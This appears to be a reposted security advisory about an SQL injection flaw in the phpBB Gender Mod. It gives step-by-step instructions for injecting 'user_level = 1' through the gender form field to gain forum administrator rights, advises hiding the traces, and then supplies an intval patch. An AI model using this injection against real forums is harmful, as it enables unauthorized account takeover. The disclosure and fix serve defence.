Lỗi bảo mật của forum php 2.0.x
trang này đã được đọc
lần
## Description:
## Gender Mod is a commonly used modification in official phpBB releases.
## Unchecked posted values can add some SQL fields into the UPDATE sql
command.
## This affects in the newest version 1.1.3.
## If you assign the value: 'user_level = 1', you will have the
ADMINISTRATOR
## PRIVILEGE in forum.
##
## Exploit:
## 1. Save the User Profile page into your disk to modify it offline.
## 2. Add the correct full post action address
(http://forum.victim.com/...):
## <FORM action=http://forum.victim.com/profile.php?
sid=<current_session_id> method=post
## encType=multipart/form-data>
## 3. Modify the HTML Form so that the input field "gender" has value like:
## <input type=text name=gender value="0, user_level = 1 ">
## 4. Load this page in the same browser window where the cookie is still
available.
## Take care all your works to hide the tracking of your hacking and
finally hit Submit
## to change user profile. You've done.
##
## Patch:
## File To Patch:
## forumroot/includes/usercp_register.php
##
## Note.
## The phpBB team has also been emailed about this problem.
##
#########################################################################
# Patch
#
#-----[ OPEN ]------------------------------------------
#
forumroot/includes/usercp_register.php
#
#-----[ FIND ]------------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS
['gender'] : 0;
#
#-----[ REPLACE AS ]------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval
($HTTP_POST_VARS['gender']) : 0;
#
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]-------------------
#
# EoP